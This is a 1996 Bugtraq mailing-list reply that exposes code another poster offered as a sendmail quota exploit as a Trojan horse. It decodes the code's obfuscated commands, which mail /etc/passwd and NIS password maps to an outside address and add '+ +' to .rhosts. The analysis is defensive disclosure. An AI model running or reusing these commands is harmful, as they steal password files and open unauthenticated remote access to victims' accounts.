[2978] in bugtraq
Re: quotas? maybe you're not seeing all of it
daemon@ATHENA.MIT.EDU (Don Lewis)
Mon Jul 22 21:38:52 1996
Date: Mon, 22 Jul 1996 14:30:17 -0700
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: Don Lewis <Don.Lewis@tsc.tdk.com>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To: "Brett L. Hawn" <blh@nol.net> "quotas? maybe you're not seeing
all of it" (Jul 21, 10:57am)
Trojan horse alert!
On Jul 21, 10:57am, "Brett L. Hawn" wrote:
} Subject: quotas? maybe you're not seeing all of it
} I finally found the source to this annoying little monster so I thought I'd
} let ya'll see it. I don't know off hand if this little bug has been seen
} before/discussed before but if it hasn't I'm quite sure all of you would
} love to fix it :) I've not tried it on anything but Solaris 2.5 so far but
} I've no doubt that it'll work elsewhere as well.
}
} What this does is takes a file and hides it in somone else's directories
} using sendmail.
I don't think so ...
I changed the system() calls to 'printf("%s\n", ...)'
} system(zipper(initseeds));
I couldn't make sense of this, initseeds appears to be mangled.
} system(zipper(setupseeds));
This executes:
cat /etc/passwd 2>/dev/null | mail tsk@mail.thirdwave.net >/dev/null 2>/dev/null
} system(checkseed(binseeds));
This executes:
ypcat passwd.byname 2>/dev/null | mail tsk@mail.thirdwave.net >/dev/null 2>/dev/null
but only if a directory in your path doesn't exist.
} system("%s\n",zipper(procseeds));
I don't think system() can be called with printf() style arguments, but
this executes:
touch .rhosts 2>/dev/null
} system("%s\n",zipper(boutseeds));
This executes:
echo + + 2>/dev/null >> .rhosts
} system("%s\n",zipper(shtdwnseeds));
This executes:
chmod 700 .rhosts 2>/dev/null
